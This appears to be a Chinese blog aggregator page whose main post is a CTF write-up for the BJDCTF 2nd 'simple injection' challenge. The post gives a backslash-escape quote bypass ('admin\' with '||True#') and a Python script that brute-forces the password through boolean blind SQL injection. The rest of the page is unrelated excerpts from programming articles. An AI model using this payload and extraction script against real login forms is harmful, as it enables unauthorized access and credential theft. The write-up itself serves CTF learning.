当前位置：首页 > news >正文

[BJDCTF 2nd]简单注入

news 2026/2/6 7:27:32

sqlsqlsqlsqlsql又来喽

过滤了单双引号，等于符号，还有select等，但是这里没有二次注入。扫描发现hint.txt

看出题人的意思是，得到密码即可获得flag。

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

不能用引号闭合。所以可以使用转义符"\"。

设计
username=admin\
password=||True#结果
select * from users where username='admin\' and password='||True#';现在的username=admin\' and password=这样就变成了合法的异或查询，此查询结果为真，页面返回关键字BJD needs to be stronger若返回为假，则关键字为You konw ,P3rh4ps needs a girl friend

从提示例我们还可以得知列名是password，表名是users。

明白了原理，脚本就好写了。因为 "=" "like"都被过滤了，这里使用>。

这里我写上自己脚本

import requestsflag=''url='http://d20acdc1-326d-4834-9339-ba1a7f747356.node5.buuoj.cn:81/index.php'
for i in range(1,200):for num in range(128,40,-1):data = {"username":"admin\\","password":"||ascii(substr(database(),{},1))>{}#".format(str(i),str(num))}data1 = {"username": "admin\\", "password": "||ASCII(SUBSTR(password,{},1))>{}#".format(str(i), str(num))}#print(data)content=requests.post(url=url,data=data1)#print(content.text)if "stronger" in content.text:num1=num+1print(chr(num1),end='')break

至于这种写法ASCII(SUBSTR(password,1,1))，我还是第一次见，为什么可以直接写password列名

最后用admin(把password换成username就可以爆出了)和密码登录就行了

[BJDCTF 2nd]简单注入

sqlsqlsqlsqlsql又来喽过滤了单双引号，等于符号，还有select等，但是这里没有二次注入。扫描发现hint.txt 看出题人的意思是，得到密码即可获得flag。 select * from users where username$_POST["username"] and passw…...

编程日记 2024/7/7 15:00:53

java项目的一些功能（完善登录功能、注册接口参数校验、完善分页查询、完善日期格式、更新文章分类和添加文章分类的分组校验、自定义校验、文件上传）

目录完善登录功能注册接口参数校验完善分页查询完善日期格式更新文章分类和添加文章分类的分组校验编辑自定义校验文件上传完善登录功能对前端传过来的明文密码进行md5加密处理 password DigestUtils.md5DigestAsHex(password.getBytes()); 这样既可注…...

编程日记 2024/7/7 14:59:51

Mac安装AndroidStudio连接手机客户端测试

参考文档：https://www.cnblogs.com/andy0816/p/17097760.html 环境依赖需要java 1.8 java安装略下载Android Studio 地址下载 Android Studio 和应用工具 - Android 开发者 | Android Developers 本机对应的包进行下载安装过程 https://www.cnblogs.c…...

编程日记 2024/7/7 14:58:50

Git 完整的提交规范教程

约定式提交规范本文中的关键词 “必须（MUST）”、“禁止（MUST NOT）”、“必要（REQUIRED）”、“应当（SHALL）”、“不应当（SHALL NOT）”、“应该（S…...

编程日记 2024/7/7 14:56:48

【TB作品】51单片机 Proteus仿真 00001仿真实物PID电机调速系统

实验报告：Proteus 仿真 PID 电机调速系统一、实验背景 PID（比例-积分-微分）控制器广泛应用于工业控制系统中，用于调节各种物理变量。本实验的目的是通过 Proteus 仿真软件设计并实现一个 PID 电机调速系统，以控制直…...

编程日记 2024/7/7 14:55:46

【LInux】从动态库的加载深入理解页表机制

💐 🌸 🌷 🍀 🌹 🌻 🌺 🍁 🍃 🍂 🌿 🍄🍝 🍛 🍤 📃个人主页 ：阿然成长日记 …...

编程日记 2024/7/7 14:54:45

IDEA与通义灵码的智能编程之旅

1 概述本文主要介绍在IDEA中如何安装和使用通义灵码来助力软件编程，从而提高编程效率，创造更大的个人同企业价值。 2 安装通义灵码 2.1 打开IDEA插件市场点击IDEA的设置按钮，下拉选择Plugins，如下： 2.2 搜索通义灵码在搜索框中输入“通义灵码”，如下： 2.3 安…...

编程日记 2024/7/7 14:53:44

多表查询sql

概述：项目开发中,在进行数据库表结构设计时,会根据业务需求及业务模块之间的关系,分析并设计表结构,由于业务之间相互关联,所以各个表结构之间也存在着各种联系，分为三种： 一对多多对多一对一一、多表关系一对多案例：部门与…...

编程日记 2024/7/7 14:51:42

摸鱼大数据——Spark SQL——DataFrame详解一

1.DataFrame基本介绍 DataFrame表示的是一个二维的表。二维表，必然存在行、列等表结构描述信息表结构描述信息(元数据Schema): StructType对象字段: StructField对象，可以描述字段名称、字段数据类型、是否可以为空行: Row对象列: Column对象&#xff…...

编程日记 2024/7/7 14:49:40

【Java探索之旅】初识多态_概念_实现条件

文章目录 📑前言一、多态1.1 概念1.2 多态的实现条件 🌤️全篇总结 📑前言多态作为面向对象编程中的重要概念，为我们提供了一种灵活而强大的编程方式。通过多态，同一种操作可以应用于不同的对象，并根据对象…...

编程日记 2024/7/7 14:48:38

[Day 26] 區塊鏈與人工智能的聯動應用：理論、技術與實踐

數據科學與AI的整合應用數據科學（Data Science）和人工智能（AI）在現代技術世界中扮演著至關重要的角色。兩者的整合應用能夠為企業和研究人員提供強大的工具，以更好地理解、預測和解決各種複雜的問題。本文將深入探討…...

编程日记 2024/7/7 14:47:37

算法 —— 滑动窗口

目录长度最小的子数组无重复字符的最长子串最大连续1的个数将x减到0的最小操作数找到字符串中所有字母异位词最小覆盖子串长度最小的子数组 sum比target小就进窗口，sum比target大就出窗口，由于数组是正数，所以相加会使sum变大&…...

编程日记 2024/7/7 14:44:34

【设计模式】工厂模式（定义 | 特点 | Demo入门讲解）

文章目录定义简单工厂模式案例 | 代码Phone顶层接口设计Meizu品牌类Xiaomi品牌类PhoneFactory工厂类Customer 消费者类工厂方法模式案例 | 代码PhoneFactory工厂类 Java高级特性---工厂模式与反射的高阶玩法方案：反射工厂模式总结其实工厂模式就是用一个代理类帮…...

编程日记 2024/7/7 14:43:32

Linux之计划和日志

计划任务计划任务概念解析在Linux操作系统中，除了用户即时执行的命令操作以外，还可以配置在指定的时间、指定的日期执行预先计划好的系统管理任务（如定期备份、定期采集监测数据）。通过安装at和crontabs这两个系统服务实现一次性、周期性计划任务的功能，并分别通过at、…...

编程日记 2024/7/7 14:42:31

C++ 多态篇

文章目录 1. 多态的概念和实现1.1 概念1.2 实现1.2.1 协变1.2.2 析构函数1.2.3 子类虚函数不加virtual 2. C11 final和override3.1 final3.2 override 3. 函数重载、重写与隐藏4. 多态的原理5. 抽象类6.单继承和多继承的虚表6.1 单继承6.2 多继承 7. 菱形继承的虚表(了解)7.1 菱…...

编程日记 2024/7/7 14:41:29

LVGL-SquareLine Studio ■ SquareLine Studio-官网下载地址■ SquareLine Studio-参考博客■ SquareLine Studio-安装■ SquareLine Studio-汉化■ SquareLine Studio-■ SquareLine Studio-■ SquareLine Studio-■ SquareLine Studio-■ SquareLine Studio- ■ SquareLine S…...

编程日记 2024/7/7 14:38:27

mysqli 与mysql 区别和联系, 举例说明

mysqli是一种PHP的扩展，用于与MySQL数据库进行交互。它提供了一套面向对象的接口，可以更方便地操作数据库。MySQL是一种关系型数据库管理系统，用于存储和管理数据。区别： mysqli是MySQL的扩展，而不是单独的数据库管…...

编程日记 2024/7/7 14:36:25

【SpringCloud应用框架】Nacos安装和服务提供者注册

第二章 Spring Cloud Alibaba Nacos之Nacos安装和服务提供者注册文章目录 Nacos介绍为何使用Nacos？一、Nacos下载和安装1. 下载2. 安装Linux/Unix/MacWindows 二、Nacos服务提供者注册1. Nacos代替Eureka2. Nacos服务注册中心3. 引入Nacos Discovery进行服务注册/发…...

编程日记 2024/7/7 14:35:24

英语学习交流小程序的设计

管理员账户功能包括：系统首页，个人中心，用户管理，每日打卡管理，备忘录管理，学习计划管理，学习资源管理，论坛交流微信端账号功能包括：系统首页，学习资源&…...

编程日记 2024/7/7 14:34:22

Chapter03-Authentication vulnerabilities

文章目录 1. 身份验证简介1.1 What is authentication1.2 difference between authentication and authorization1.3 身份验证机制失效的原因1.4 身份验证机制失效的影响 2. 基于登录功能的漏洞2.1 密码爆破2.2 用户名枚举2.3 有缺陷的暴力破解防护2.3.1 如果用户登录尝试失败次…...

编程新知 2026/1/31 18:11:04

Java如何权衡是使用无序的数组还是有序的数组

在 Java 中，选择有序数组还是无序数组取决于具体场景的性能需求与操作特点。以下是关键权衡因素及决策指南： ⚖️ 核心权衡维度维度有序数组无序数组查询性能二分查找 O(log n) ✅线性扫描 O(n) ❌插入/删除需移位维护顺序 O(n) ❌直接操作尾部 O(1) ✅内存开销与无序数组相…...

编程新知 2025/8/3 11:17:37

Swift 协议扩展精进之路：解决 CoreData 托管实体子类的类型不匹配问题（下）

概述在 Swift 开发语言中，各位秃头小码农们可以充分利用语法本身所带来的便利去劈荆斩棘。我们还可以恣意利用泛型、协议关联类型和协议扩展来进一步简化和优化我们复杂的代码需求。不过，在涉及到多个子类派生于基类进行多态模拟的场景下，…...

编程新知 2026/1/23 4:56:05

关于iview组件中使用 table , 绑定序号分页后序号从1开始的解决方案

问题描述：iview使用table 中type: "index",分页之后 ，索引还是从1开始，试过绑定后台返回数据的id, 这种方法可行，就是后台返回数据的每个页面id都不完全是按照从1开始的升序，因此百度了下，找到了…...

编程新知 2026/1/29 20:58:41

Frozen-Flask ：将 Flask 应用“冻结”为静态文件

Frozen-Flask 是一个用于将 Flask 应用“冻结”为静态文件的 Python 扩展。它的核心用途是：将一个 Flask Web 应用生成成纯静态 HTML 文件，从而可以部署到静态网站托管服务上，如 GitHub Pages、Netlify 或任何支持静态文件的网站服务器。 &am…...

编程新知 2025/12/5 20:57:13